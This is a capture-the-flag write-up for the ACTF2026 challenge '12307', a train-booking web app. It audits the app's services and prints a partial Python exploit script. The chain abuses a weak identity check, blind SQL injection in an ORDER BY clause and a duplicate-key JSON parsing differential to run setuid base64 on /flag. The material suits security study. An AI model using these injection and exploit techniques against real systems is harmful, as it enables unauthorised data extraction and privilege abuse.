ACTF2026

Making up for the regret of skipping it last year.

12307

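From the challenge author:

Challenge description: Book your train ticket to the FLAG…… Now!

Expected difficulty: easy (103 / 1000 pts / 175 solves); expected solve time using codex: 5 minutes

Positioning: a multi-service warm-up challenge whose exploit chain is stitched together from business-logic flaws.


Background: this challenge was finished in a hurry only 24h before the contest. Since it is a warm-up challenge, that should be fine, right? Perhaps because an agent has a strong affinity for code it wrote itself, I could never push the expected solve time above half an hour when relying on an agent alone; done purely the old-fashioned manual way, it would probably take an hour or two, or even longer. This challenge may be a textbook example of the vulnerability type agents are best at.


The author intended this as a warm-up that Codex clears in 5 minutes, and estimated that a human might need 1-2 hours or more. Since I am doing it outside the contest, I treated it as code-audit practice.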

First, gather some information:

nginx.conf

server {
    ...
    location /api/ {
        proxy_pass http://passenger_gateway;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection $connection_upgrade;
        proxy_set_header Host $host;
        proxy_set_header Cookie $http_cookie;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
    }

    location /rail-local/ {
        return 404;
    }

    location /signer/ {
        return 404;
    }

    location /station/import/ {
        return 404;
    }

    location /settlement-worker/ {
        return 404;
    }

    location / {
        try_files $uri $uri/ /index.html;
    }
}

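From this we know that normal traffic can only reach /api/, while internal endpoints such as /rail-local/ are not reachable from outside (nginx returns 404 for them).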

Dockerfile

RUN cat > /start.sh <<'EOF'
#!/bin/sh
set -eu
rm -f /start.sh

chown root:root /flag
chmod 0600 /flag
chown root:root /usr/bin/base64
chmod 4755 /usr/bin/base64

install -d -m 0750 -o settle -g settle /run/rail-spool
spool_key="$(od -An -N24 -tx1 /dev/urandom | tr -d ' \n')"
printf '%s\n' "$spool_key" > /run/rail-spool/bridge.key
cat > /run/rail-spool/device-map.json <<'MAP'
{
"profile-delta-closeout": {"codec":"settlement-filter","acceptedPrograms":["/usr/bin/base64"]},
"profile-north-closeout": {"codec":"settlement-filter","acceptedPrograms":["/usr/bin/printf"]},
"profile-baggage-preview": {"codec":"settlement-filter","acceptedPrograms":["/usr/bin/printf"]}
}
MAP

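From this we know that /flag is readable only by root, but /usr/bin/base64 is owned by root with mode 4755, i.e. it has the setuid bit set (this is SUID, not sudo). If we can get base64 executed, it can read /flag for us.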
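As a quick sanity check on those modes, here is a minimal sketch using Python's stat module. The two modes come from start.sh; treating both paths as regular files (S_IFREG) is an assumption made only so that stat.filemode() can render them.

```python
import stat

# Modes taken from start.sh. S_IFREG is added (assumption: both are regular
# files) only so that stat.filemode() can render an ls-style string.
FLAG_MODE = stat.S_IFREG | 0o600     # chmod 0600 /flag
BASE64_MODE = stat.S_IFREG | 0o4755  # chmod 4755 /usr/bin/base64


def is_setuid(mode: int) -> bool:
    """Return True when the setuid bit is set in a st_mode value."""
    return bool(mode & stat.S_ISUID)


def others_can_read(mode: int) -> bool:
    """Return True when users other than owner/group may read the file."""
    return bool(mode & stat.S_IROTH)


for name, mode in (("/flag", FLAG_MODE), ("/usr/bin/base64", BASE64_MODE)):
    print(name, stat.filemode(mode), "setuid" if is_setuid(mode) else "plain")
```

Because the binary is owned by root and setuid, a process that executes it runs with an effective UID of 0, so it can open /flag even though the caller cannot.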

As for how the source executes a command, start with run_driver(program, argument) in services\print_spooler\worker.py:

pid = os.posix_spawn(program, [program, argument], os.environ, file_actions=file_actions)

This executes program with argument as its only argument. Next, let's see where run_driver is called; it is still worker.py:

def handle(raw):
    ...
    program = str(ticket.get("driverProgram", ""))
    argument = str(ticket.get("driverArgument", ""))
    accepted = route.get("acceptedPrograms")
    if not isinstance(accepted, list) or program not in [str(item) for item in accepted]:
        publish(ticket_id, "review")
        return
    value = run_driver(program, argument)
    ...

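As you can see, program and argument are read from the ticket's driverProgram and driverArgument fields, and program must appear in the route's acceptedPrograms list.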
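To see which route would let /usr/bin/base64 through, the allowlist check can be replayed against the device map from start.sh. This is only a sketch: how the worker resolves a ticket to a route is elided in the excerpt, so iterating over profile names here is an assumption, and profiles_accepting is a hypothetical helper.

```python
import json

# device-map.json exactly as written by start.sh.
DEVICE_MAP = json.loads("""
{
  "profile-delta-closeout": {"codec": "settlement-filter", "acceptedPrograms": ["/usr/bin/base64"]},
  "profile-north-closeout": {"codec": "settlement-filter", "acceptedPrograms": ["/usr/bin/printf"]},
  "profile-baggage-preview": {"codec": "settlement-filter", "acceptedPrograms": ["/usr/bin/printf"]}
}
""")


def is_accepted(route: dict, program: str) -> bool:
    """Same condition as in handle(): the list must exist and contain program."""
    accepted = route.get("acceptedPrograms")
    return isinstance(accepted, list) and program in [str(item) for item in accepted]


def profiles_accepting(program: str) -> list:
    """Hypothetical helper: names of all profiles whose allowlist has program."""
    return sorted(name for name, route in DEVICE_MAP.items() if is_accepted(route, program))


print(profiles_accepting("/usr/bin/base64"))
```

Only one profile accepts base64, which suggests the rest of the chain has to steer the ticket onto that profile's route.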

The ticket itself is built in services\depot_layout\app.py:

def spool_device(route, context):
    print_plan = context.get("printPlan") if isinstance(context.get("printPlan"), dict) else {}
    ticket = {
        "ticketId": random_id("P", 12),
        "deviceRef": route["device_ref"],
        "stationCode": route["station_code"],
        "driverProfile": route.get("driver_profile", ""),
        "codec": route.get("codec", ""),
        "driverProgram": str(print_plan.get("driverProgram", ""))[:160],
        "driverArgument": str(print_plan.get("driverArgument", ""))[:160],
        "context": {
            "batchId": context.get("batchId"),
            "orderId": context.get("orderId"),
            "stationCode": context.get("stationCode"),
        },
        "issuedAt": int(time.time()),
    }

depot_layout in turn receives its request from services\settlement_worker\worker.py:

def bridge_preview(device_ref, context, print_plan):
    body = json.dumps({
        "deviceRef": str(device_ref)[:64],
        "context": {
            "batchId": context.get("batchId"),
            "orderId": context.get("orderId"),
            "stationCode": context.get("stationCode"),
            "printPlan": {
                "driverProgram": str(print_plan.get("driverProgram", ""))[:160],
                "driverArgument": str(print_plan.get("driverArgument", ""))[:160],
            },
        },
    }, separators=(",", ":")).encode()
    try:
        conn = http.client.HTTPConnection("127.0.0.1", int(os.environ.get("LAYOUT_PORT", "5009")), timeout=3)
        conn.request("POST", "/depot/layout/preview", body=body, headers={  # the request is sent here
            "Content-Type": "application/json",
            "Content-Length": str(len(body)),
            "X-Layout-Bridge": "bureau",
        })
        resp = conn.getresponse()
        payload = resp.read()
        if resp.status != 200:
            return "[layout-error]"
        data = safe_json(payload.decode(errors="replace"), {}) or {}
        return str(data.get("value", ""))[:4000]
    except Exception as exc:
        return f"[layout-error:{exc.__class__.__name__}]"

This function takes a print_plan parameter, which is built in services\receipt_signer\app.py:

def verify_carrier_seal(data, order, batch_id, template_digest, station_cfg, boarding_channel):
    ...
    print_plan = {
        "profile": str(render_view.get("printProfile", "counter-copy"))[:64],
        "printer": str(render_view.get("printer", "thermal-standard"))[:64],
        "prefix": str(render_view.get("prefix", "reconciliation"))[:48],
        "cell": str(render_view.get("cell", "receipt"))[:48],
        "ledgerRef": checks["ledgerRef"],
        "boardingNonce": str((boarding_channel or {}).get("boardingNonce", "")),
        "driverProgram": str(render_view.get("driverProgram", ""))[:160],
        "driverArgument": str(render_view.get("driverArgument", ""))[:160],
    }
    return print_plan, []

This happens during the settlement phase, so this is the step where we can inject /usr/bin/base64 and /flag.

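Now that we know how to get a command executed, let's go back to the beginning and analyze how the project works:

First, identity

On the frontend this is requestIdentity(), in frontend/src/main.jsx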

async function requestIdentity() {
  try {
    await api("/api/mobile/identity/continue", {
      method: "POST",
      body: JSON.stringify({
        passenger: passengerName || "Passenger",
        relayState: { next: "rail://continue/seat-hold", flow: ["seat-hold"] },
        partnerMetadata: {
          entityID: "railway-partner",
          compatBinding: "x-accel",
          role: "PassengerIdentityProvider",
        },
        assertion: "<Assertion><Audience>12307</Audience><NameID>mobile-passenger</NameID><Signature>RelayState</Signature></Assertion>",
      }),
    });
    await loadWorkspace();
    flash("Passenger identity continued");
  } catch (error) {
    flash(error.data?.error || "Identity continuation failed");
  }
}

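The passenger's identity is not issued directly by the local system. It is passed in from a partner, and the local side then turns it into a session of its own.

The backend is in services/sso_gateway/server.js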

async function continueIdentity(req, res) {
  ...
  const ok = partnerContinuation(data);
  const sessionId = crypto.randomBytes(18).toString("base64url");
  const session = {
    state: ok ? "compat-pending" : "pending",
    trust: ok ? "partner-continuation" : "unverified",
    partnerId: String(data.partnerId || "mobile-partner").slice(0, 64),
    stationCode: String(data.stationCode || "BJP").slice(0, 16),
    trustLevel: Array.isArray(data.trustLevel) ? data.trustLevel : ["mobile", ok ? "partner" : "guest"],
    passenger,
    issuedAt: Date.now(),
  };
  await redisCommand("SET", `rail:sso:session:${sessionId}`, JSON.stringify(session), "EX", "900");
  ...
}

partnerContinuation(data) actually just performs a series of string matches: as long as certain expected fields and keywords appear in the data, you get a compat-pending session.
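The weakness of that kind of check can be illustrated with a small Python sketch. It is not the real partnerContinuation(): the body of that function is not shown here, so the keyword list and the looks_like_partner helper are assumptions chosen only to match the strings that appear in the frontend request and in the exploit.

```python
import json

# Hypothetical keyword list; the real check lives in sso_gateway/server.js.
KEYWORDS = ("railway-partner", "compatBinding", "PassengerIdentityProvider")


def looks_like_partner(data: dict) -> bool:
    """Naive check: every keyword must occur somewhere in the serialized body."""
    blob = json.dumps(data)
    return all(word in blob for word in KEYWORDS)


# Structured metadata, as sent by the frontend.
frontend_request = {
    "partnerMetadata": {
        "entityID": "railway-partner",
        "compatBinding": "x-accel",
        "role": "PassengerIdentityProvider",
    }
}
# A flat string that merely mentions the same words, as used in the exploit.
forged_request = {
    "partnerMetadata": "railway-partner compatBinding PassengerIdentityProvider"
}

print(looks_like_partner(frontend_request), looks_like_partner(forged_request))
```

A substring test cannot tell a structured partner document from free text that mentions the same words, and nothing in it verifies a signature.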

But besides the session obtained above, a continuation is also needed

async function completeSession(req, res) {
  ...
  data.state = "complete";
  data.completedAt = Date.now();
  await redisCommand("SET", `rail:sso:session:${sessionId}`, JSON.stringify(data), "EX", "900");
  await redisCommand("SET", `rail:passenger:continuation:${sessionId}`, JSON.stringify({
    passenger: data.passenger,
    trust: data.trust,
    partnerId: data.partnerId || "mobile-partner",
    stationCode: data.stationCode || "BJP",
    trustLevel: data.trustLevel || ["mobile", "partner"],
    completedAt: data.completedAt,
  }), "EX", "900");
  ...
}

holdFlow() in services/edge_gateway/server.js first checks the continuation state:

async function holdFlow(req, res, body) {
  const check = await proxy(5002, "/session/check", "GET", Buffer.alloc(0), req.headers);
  let seatHoldClass = "";
  if (check.status === 204 && check.headers["x-session-continuation"] === "complete") {
    seatHoldClass = "quota-sync";
  } else if (check.status === 401 && check.headers["x-session-continuation"] === "pending") {
    const continued = await proxy(5002, "/_rail/session/check", "GET", Buffer.alloc(0), req.headers, {
      "X-Session-Bridge": "continue",
    });
    if (continued.status === 204) seatHoldClass = "quota-sync";
  }

  const held = await proxy(5000, "/orders/hold", "POST", body, req.headers, {
    "X-Seat-Hold-Class": seatHoldClass,
  });
  ...
}

Later, when ticketing_api.create_order() is triggered, it takes passenger_session from the cookie and then calls session_to_mysql()

cookies = parse_cookie(self.headers.get("Cookie", ""))
passenger_session = cookies.get("passenger_session", "guest")
session_to_mysql(passenger_session, passenger)

session_to_mysql() inserts into partner_trust only when a continuation exists

raw = redis.command("GET", f"rail:sso:session:{session_id}")
...
continuation = redis.command("GET", f"rail:passenger:continuation:{session_id}")
if continuation:
    ...
    INSERT INTO partner_trust(...)

So the takeaway here is that the rest of the flow requires a continuation

Next comes booking

function TrainCard({ train, seatClass, reserve, requestBoard }) {
  const status = seatStatus(train, seatClass);
  const fare = Number(train.price || 0) * (seatClass === "business" ? 2.7 : seatClass === "first" ? 1.45 : 1);
  return (
    ...
    <span>From <strong>{money(fare)}</strong></span>
    <button onClick={() => reserve(train, status)}>{status.left > 0 ? "Reserve" : "Join waitlist"}</button> {/* branches on whether any seats are left */}
  );
}

Then reserve()

async function reserve(train, status) {
  try {
    if (status.left <= 0) {
      await api("/api/mobile/orders/hold", {
        method: "POST",
        body: JSON.stringify({ trainId: train.id, seatClass, holdMode: "waitlist" }),
      });
    }
    const passenger = passengerName || workspace.session?.passenger || "Passenger";
    const data = await api("/api/mobile/orders", {
      method: "POST",
      body: JSON.stringify({ trainId: train.id, seatClass, passenger }),
    });
    flash(data.order.status === "waitlisted" ? `${data.order.trainId} waitlisted` : `${data.order.trainId} reserved`);
    await loadWorkspace();
  } catch (error) {
    flash(error.data?.error === "identity_continuation_required" ? "Complete passenger identity first" : error.data?.error || "Reservation failed");
  }
}

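It requests /api/mobile/orders/hold (the waitlist hold, only when no seats are left) and then /api/mobile/orders (order creation). We'll skip the details for now and look at what has to happen after booking.

Next is the station desk. Here are its endpoints: services/station_portal/app.py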

station_portal is the desk service
list_notices(): lists notices
create_notice(): publishes an in-station notice and also stores proxy_hint
search_tickets(): queries ticket_index
reprice_fare(): re-quotes the fare for a station / tariffScope
adjust_ticket(): records an adjustment memo based on the claim proof
health_import(): forwards desk-side events to station_import

Next is station_import

services/station_import/app.py

It does different things depending on the adapter:

station-partner-feed: compiles the in-station notice feed and publishes lane / board profile / partner jwks
station-desk-ledger: consumes ticket_adjustments and compiles desk memos into real business state
enterprise-clearing: activates a tariff exception claim as a layout entitlement

Mostly it writes to Redis

After that comes settlement

/api/corporate/reconciliation
  -> pricing_sampler.create_batch()
  -> creates a render_jobs row

/api/corporate/receipts/prepare
  -> enterprise_gateway.mergeLayoutClaim()
  -> station_import.enterprise-clearing
  -> receipt_signer.validate_context()
  -> receipt_signer.verify_carrier_seal()
  -> creates a settlement_receipts row
  -> writes rail:receipt:seal:<receipt_id> to Redis

/api/corporate/settlement/schedule
  -> settlement_scheduler.schedule_batch()
  -> Redis LPUSH rail:settlement:jobs

settlement_worker
  -> BRPOP rail:settlement:jobs
  -> handle_job()
  -> load_context()
  -> validate()
  -> render()
  -> if there is a service-device, continues to bridge_preview()   <-- this is where the controllable program parameter analyzed earlier comes in

bridge_preview()
  -> HTTP /depot/layout/preview
  -> depot_layout.collect_device()
  -> spool_device()
  -> Redis LPUSH rail:spool:requests

print_spooler
  -> BRPOP rail:spool:requests
  -> handle()
  -> run_driver(program, argument)
  -> Redis LPUSH rail:spool:result:<ticketId>

Finally the result goes from Redis back to depot_layout
  -> settlement_worker.render()
  -> MySQL render_results.body

Mapped to the actual code, this looks roughly as follows:

services/pricing_sampler/app.py

def create_batch(self, data):
    ...
    template = REPORT_TEMPLATES.get(report_type, REPORT_TEMPLATES["fare-preview"])
    template_digest = digest_template(template)
    ...
    execute(
        """
        INSERT INTO render_jobs(batch_id,receipt_id,order_id,station_code,template_digest,template_body,data_json,status,created_at,updated_at)
        ...
        """
    )

Its job is to create a batch first, which corresponds to one render_jobs row

Next is services/enterprise_gateway/server.js

if (req.method === "POST" && path === "/api/enterprise/receipts/prepare") {
  ...
  await mergeLayoutClaim(orderId, stationCode);
  const cachedLane = await redisGet(`rail:interline:lane:${stationCode}`);
  const signerLane = laneFromCache(cachedLane);
  ...
  const response = await forward(SIGNER_PORT, "/signer/receipts/prepare", body, signerHeaders);
  ...
}

Here it first calls mergeLayoutClaim(), i.e. it fills in the layout entitlement state, and only then forwards the request to the real receipt_signer

mergeLayoutClaim() actually hits station_import

async function mergeLayoutClaim(orderId, stationCode) {
  ...
  const body = Buffer.from(JSON.stringify({
    stationCode,
    adapter: "enterprise-clearing",
    target: `rail-mesh://clearing/layout?orderId=${encodeURIComponent(orderId)}&stationCode=${encodeURIComponent(stationCode)}`,
    payload: "invoice-dispute=merged",
  }));
  await forward(IMPORT_PORT, "/station/import/probe", body, {
    "X-Enterprise-Gateway": "station-mesh",
  });
}

On the station_import side:

if adapter == "enterprise-clearing" and order_id:
    return activate_layout_claim(order_id, station_code)

Which then enters:

def activate_layout_claim(order_id, station_code):
    ...
    execute(
        """
        INSERT INTO bureau_layout_cells(...)
        """
    )
    ...
    redis.command("SET", f"rail:layout:entitlement:{order_id}", station_code, "EX", "180")

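In other words, the point of this step is: before the enterprise side prepares a receipt, the layout entitlement must already have been issued. Note that the key expires after 180 seconds.

Both receipt_signer and settlement_worker check this state later

Next we enter services/receipt_signer/app.py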

def validate_context(handler, data, batch_id, order, template_digest):
    ...
    profile = one("SELECT * FROM station_profiles WHERE station_code=%s", (station_code,))
    _profile, station_cfg = station_policy(station_code)
    ...
    waitlist = one("SELECT * FROM waitlist_entries WHERE order_id=%s", (order["order_id"],))
    trust = one(
        "SELECT * FROM partner_trust WHERE session_id=%s AND status='accepted' ORDER BY created_at DESC LIMIT 1",
        (order["passenger_session"],),
    )
    ...
    continuation = live_continuation(order)
    boarding_channel = ledger_attestation(order["order_id"], station_code, station_cfg)
    layout_entitlement = redis.command("GET", f"rail:layout:entitlement:{order['order_id']}") or ""

From this you can read off the prerequisites for a trusted receipt:

1. The order must be waitlisted
2. waitlist_entries.sampled = 1
3. station_profiles.batch_open = 1, plus renderer_profile / signer_route
4. partner_trust.status = accepted
5. rail:passenger:continuation exists
6. rail:ledger:channel exists
7. rail:layout:entitlement exists

Once these are satisfied, verify_carrier_seal() runs

def verify_carrier_seal(data, order, batch_id, template_digest, station_cfg, boarding_channel):
    ...
    public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
    render_view = json.loads(payload_text)
    ...
    for key, expected_value in checks.items():
        if str(public_view.get(key, "")) != str(expected_value):
            return None, ["partner_receipt_review"]

    print_plan = {
        "profile": str(render_view.get("printProfile", "counter-copy"))[:64],
        "printer": str(render_view.get("printer", "thermal-standard"))[:64],
        "prefix": str(render_view.get("prefix", "reconciliation"))[:48],
        "cell": str(render_view.get("cell", "receipt"))[:48],
        "ledgerRef": checks["ledgerRef"],
        "boardingNonce": str((boarding_channel or {}).get("boardingNonce", "")),
        "driverProgram": str(render_view.get("driverProgram", ""))[:160],
        "driverArgument": str(render_view.get("driverArgument", ""))[:160],
    }
    return print_plan, []

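Note a crucial point here: validation uses public_view, while the subsequent print parameters are built from render_view. public_view is parsed with a first-wins hook, whereas a plain json.loads keeps the last occurrence of a duplicated key. So if the JSON contains duplicate keys, the value that gets validated can differ from the value that is actually used.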
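The parser differential is easy to reproduce in isolation. In the sketch below the name first_wins_object comes from the source, but its body is not shown there, so this implementation is an assumption about what such a hook typically looks like.

```python
import json


def first_wins_object(pairs):
    """object_pairs_hook that keeps the first value seen for each key.

    Assumed implementation; the real hook in receipt_signer is not shown.
    """
    out = {}
    for key, value in pairs:
        out.setdefault(key, value)
    return out


payload_text = (
    '{"printer":"thermal-standard",'
    '"printer":"line-printer",'
    '"driverProgram":"/usr/bin/base64"}'
)

public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
render_view = json.loads(payload_text)  # default dict building: last duplicate wins

print("validated:", public_view["printer"])
print("used     :", render_view["printer"])
```

The same bytes yield two different objects, so any check performed on one view says nothing about the other.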

After that comes the stage analyzed earlier, where /usr/bin/base64 /flag gets executed
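For reference, here is a minimal sketch of spawning a program with exactly one argument through os.posix_spawn and capturing its stdout. The real file_actions used by run_driver are not shown in the excerpt, so the pipe wiring and the name run_driver_sketch are assumptions; /bin/echo stands in for the driver so the example is harmless to run on a POSIX system.

```python
import os


def run_driver_sketch(program: str, argument: str) -> bytes:
    """Spawn program with a single argument (no shell) and return its stdout."""
    read_fd, write_fd = os.pipe()
    file_actions = [
        (os.POSIX_SPAWN_DUP2, write_fd, 1),  # child's stdout goes into the pipe
        (os.POSIX_SPAWN_CLOSE, read_fd),     # child does not need the read end
    ]
    pid = os.posix_spawn(program, [program, argument], os.environ,
                         file_actions=file_actions)
    os.close(write_fd)  # parent keeps only the read end, so EOF arrives on exit
    with os.fdopen(read_fd, "rb") as reader:
        output = reader.read()
    os.waitpid(pid, 0)
    return output


# No shell is involved, so metacharacters in the argument stay literal.
print(run_driver_sketch("/bin/echo", "/flag; id"))
```

Since there is no shell and only one argument slot, the payload has to be a program that does something useful with a single path, which is exactly what a setuid base64 offers.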

So where are the exploitable weak points?

Identity

services/sso_gateway/server.js

Here partnerContinuation() only does substring checks, so an external request crafted to look like a partner continuation obtains a compat-pending session

Then holdFlow() in edge_gateway automatically goes through /_rail/session/check to complete the continuation, so the waitlist order created afterwards carries a passenger_session that passes the trusted-settlement checks
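The branch in holdFlow() can be transcribed into a small pure function to make the upgrade path explicit. This is a sketch: seat_hold_class and its parameters are hypothetical names, and bridge_status stands for the status returned by the internal /_rail/session/check call, whose server-side logic is not shown here.

```python
from typing import Optional


def seat_hold_class(check_status: int, continuation: str,
                    bridge_status: Optional[int]) -> str:
    """Python transcription of the seatHoldClass decision in holdFlow()."""
    if check_status == 204 and continuation == "complete":
        return "quota-sync"
    if check_status == 401 and continuation == "pending":
        # The gateway itself retries through the internal bridge endpoint,
        # adding X-Session-Bridge: continue on the caller's behalf.
        if bridge_status == 204:
            return "quota-sync"
    return ""


print(repr(seat_hold_class(401, "pending", 204)))
print(repr(seat_hold_class(401, "pending", 403)))
```

The client never has to reach /_rail/session/check directly: a pending session is enough, because the gateway makes the privileged call for it.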

ORDER BY injection in desk repricing

services/station_portal/app.py

def fare_scope_expression(scope):
    ...
    if scope.get("mode") == "legacy-rank":
        return str(scope.get("expr", "ticket_no"))[:240]

And then in:

sql = (
    "SELECT ticket_no,station_code,status FROM ticket_index "
    "WHERE station_code IN (%s,'BJP') "
    f"ORDER BY {scope} LIMIT 1"
)

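Here expr is concatenated directly into ORDER BY, so /api/desk/fares/reprice can be used for boolean-based blind injection: the condition decides which row sorts first, the returned bucket reveals the answer, and character by character we extract the content behind claimProof from station_claim_artifacts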
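The oracle can be simulated offline to see why the XOR trick works. In this sketch the two rows, the SECRET value and the "delta-window" bucket name are made up for illustration; only the "north-window" bucket and the station_code='BJP' XOR (...) expression come from the exploit. Python's sorted() stands in for MySQL's ORDER BY, where false (0) sorts before true (1).

```python
SECRET = "CP-demo"  # hypothetical stand-in for the subquery result

ROWS = [
    {"station_code": "HGH", "bucket": "delta-window"},  # hypothetical bucket name
    {"station_code": "BJP", "bucket": "north-window"},
]


def fare_bucket(condition: bool) -> str:
    """Simulate ORDER BY (station_code='BJP' XOR condition) LIMIT 1."""
    ordered = sorted(ROWS, key=lambda row: (row["station_code"] == "BJP") ^ condition)
    return ordered[0]["bucket"]


def char_greater_than(position: int, threshold: int) -> bool:
    """Stand-in for ASCII(SUBSTRING((subquery), position, 1)) > threshold."""
    code = ord(SECRET[position - 1]) if position <= len(SECRET) else 0
    return code > threshold


def leak(length: int) -> str:
    """Binary-search each character using only the bucket as feedback."""
    out = []
    for position in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if fare_bucket(char_greater_than(position, mid)) == "north-window":
                lo = mid + 1  # condition true: the character is above mid
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


print(leak(len(SECRET)))
```

With a 7-bit search range each character costs 7 requests, so a 25-character proof needs 175 calls to the reprice endpoint.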

station_import

create_notice() + station-partner-feed
  -> compiles lane / board profile / partner jwks

adjust_ticket() + station-desk-ledger
  -> compiles sampled=1, batch_open=1, renderer_profile, signer_route

enterprise-clearing
  -> compiles the layout entitlement

verify_carrier_seal()

public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
render_view = json.loads(payload_text)

Because validation and actual rendering see different values, a later duplicate key can override the earlier one

{
    "printProfile":"counter-copy",
    "printer":"thermal-standard",
    "printProfile":"clearing-batch",
    "printer":"line-printer",
    "driverProgram":"/usr/bin/base64",
    "driverArgument":"/flag"
}

This way, validation through public_view sees the first set of values,
while render_view, which actually builds print_plan, gets the second set


Exp:

#!/usr/bin/env python3
import base64
import hashlib
import hmac
import json
import re
import time

import requests
from websocket import create_connection


BASE = "http://127.0.0.1:62307"

STATION = "HGH"
TRAIN_ID = "G7608"
SEAT_CLASS = "business"
TICKET_QUERY = "HGH"
TRUSTED_POLICY_ID = "POL-HGH-TRUSTED"
TRUSTED_ROUTE = "delta-window-27"
TRUSTED_SECRET = "e94c0a8d-12307-hgh-trusted"
BOARD_STREAM = "seat-window-e27"
BOARD_TOPIC = "seat-consist"
DRIVER_PROGRAM = "/usr/bin/base64"
DRIVER_ARGUMENT = "/flag"


def make_session():
    session = requests.Session()
    session.trust_env = False
    return session


def ensure(ok, message):
    if not ok:
        raise RuntimeError(message)


def print_step(message):
    print(f"[+] {message}", flush=True)


def weak_continue_and_waitlist_channel(session):
    data = {
        "partnerMetadata": "railway-partner compatBinding PassengerIdentityProvider",
        "relayState": ["continue", "seat-hold"],
        "assertion": "<Assertion><Audience>12307</Audience><NameID>solver</NameID></Assertion>",
        "stationCode": STATION,
        "passenger": "solver",
        "trustLevel": ["mobile", "partner", "settlement"],
        "partnerId": "mobile-partner",
    }
    resp = session.post(f"{BASE}/api/mobile/identity/continue", json=data)
    ensure(resp.status_code == 202, f"identity continue failed: {resp.status_code} {resp.text}")

    resp = session.post(
        f"{BASE}/api/mobile/orders/hold",
        json={"trainId": TRAIN_ID, "seatClass": SEAT_CLASS, "holdMode": "waitlist"},
    )
    ensure(resp.status_code == 200, f"waitlist channel failed: {resp.status_code} {resp.text}")
    ensure("waitlist_session" in session.cookies.get_dict(), "waitlist_session cookie missing")


def create_waitlisted_order(session):
    resp = session.post(
        f"{BASE}/api/mobile/orders",
        json={"trainId": TRAIN_ID, "seatClass": SEAT_CLASS, "passenger": "solver"},
    )
    ensure(resp.status_code == 201, f"create order failed: {resp.status_code} {resp.text}")
    order = resp.json()["order"]
    ensure(order["status"] == "waitlisted", f"unexpected order status: {order['status']}")
    return order


def seed_notice_feed():
    session = make_session()
    proxy_hint = (
        f"X-Desk-Lane: {TRUSTED_ROUTE}\r\n"
        f"X-Board-Window: {BOARD_STREAM}\r\n"
        f"X-Desk-Key-Id: {TRUSTED_POLICY_ID}\r\n"
        f"X-Desk-Key: {TRUSTED_ROUTE}"
    )
    resp = session.post(
        f"{BASE}/api/desk/notices",
        json={"stationCode": STATION, "title": "ops", "body": "ops", "proxyHint": proxy_hint},
    )
    ensure(resp.status_code == 201, f"create notice failed: {resp.status_code} {resp.text}")

    resp = session.post(
        f"{BASE}/api/corporate/imports/relay",
        json={
            "stationCode": STATION,
            "adapter": "station-partner-feed",
            "target": f"rail-cache://redis/partner/metadata?stationCode={STATION}",
            "payload": "",
        },
    )
    ensure(resp.status_code == 200, f"compile feed failed: {resp.status_code} {resp.text}")


def lookup_ticket_no():
    session = make_session()
    resp = session.get(f"{BASE}/api/desk/tickets/search", params={"q": TICKET_QUERY, "sort": "ticket_no"})
    ensure(resp.status_code == 200, f"ticket search failed: {resp.status_code} {resp.text}")
    tickets = resp.json().get("tickets", [])
    for ticket in tickets:
        if ticket.get("trainId") == TRAIN_ID and ticket.get("stationCode") == STATION:
            return ticket["ticketNo"]
    raise RuntimeError("target ticket not found")


def fare_bucket(expr):
    session = make_session()
    resp = session.post(
        f"{BASE}/api/desk/fares/reprice",
        json={
            "stationCode": STATION,
            "amount": 0,
            "tariffScope": {"mode": "legacy-rank", "expr": expr},
        },
    )
    ensure(resp.status_code == 200, f"fare oracle failed: {resp.status_code} {resp.text}")
    return resp.json()["quote"]["bucket"]


def leak_claim_proof(order_id):
    subquery = (
        "SELECT CONCAT('CP-',claim_salt,'-',LEFT(claim_digest,12)) "
        f"FROM station_claim_artifacts WHERE order_id='{order_id}'"
    )
    out = []
    for position in range(1, 26):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            expr = (
                "station_code='BJP' XOR "
                f"(ASCII(SUBSTRING(({subquery}),{position},1))>{mid})"
            )
            if fare_bucket(expr) == "north-window":
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def apply_adjustment(ticket_no, claim_proof):
    session = make_session()
    memo = {
        "stationCode": STATION,
        "channel": "fare-desk",
        "lineItems": {
            "reason": "FARE-91",
            "layout": "folio-grid-27",
            "device": "PR-HGH-042",
            "enabled": True,
        },
    }
    resp = session.post(
        f"{BASE}/api/desk/tickets/adjust",
        json={
            "ticketNo": ticket_no,
            "claimProof": claim_proof,
            "memo": json.dumps(memo, separators=(",", ":")),
            "delta": 0,
        },
    )
    ensure(resp.status_code == 202, f"ticket adjust failed: {resp.status_code} {resp.text}")


def compile_station_rule(order_id):
    session = make_session()
    resp = session.post(
        f"{BASE}/api/desk/imports/health",
        json={
            "stationCode": STATION,
            "adapter": "station-desk-ledger",
            "target": f"rail-cache://redis/settlement/review?orderId={order_id}&stationCode={STATION}",
            "payload": "compiled",
        },
    )
    ensure(resp.status_code == 200, f"station rule compile failed: {resp.status_code} {resp.text}")


def create_batch(order_id):
    session = make_session()
    resp = session.post(
        f"{BASE}/api/corporate/reconciliation",
        json={
            "orderId": order_id,
            "stationCode": STATION,
            "reportType": "carrier-closeout",
            "defer": True,
            "data": {"carrier": "solver"},
        },
    )
    ensure(resp.status_code == 202, f"create batch failed: {resp.status_code} {resp.text}")
    return resp.json()


def refresh_epoch_and_ledger(order_id):
    session = make_session()
    weak_continue_and_waitlist_channel(session)

    resp = session.post(f"{BASE}/api/mobile/waitlist/pulse", json={"orderId": order_id})
    ensure(resp.status_code == 202, f"pulse failed: {resp.status_code} {resp.text}")

    wait_cookie = session.cookies.get("waitlist_session")
    ws = create_connection(
        f"ws://127.0.0.1:62307/api/connect/boarding?stationCode={STATION}",
        header=[f"Cookie: waitlist_session={wait_cookie}"],
        timeout=5,
        enable_multithread=False,
    )
    try:
        hello_required = json.loads(ws.recv())
        channel = hello_required["channel"]
        ensure(hello_required["topic"] == BOARD_TOPIC, f"unexpected board topic: {hello_required}")

        ws.send(json.dumps({"type": "boarding.hello", "channel": channel}))
        ready = json.loads(ws.recv())
        ensure(ready["event"] == "boarding.ready", f"unexpected ready event: {ready}")

        ws.send(json.dumps({
            "type": "boarding.bind",
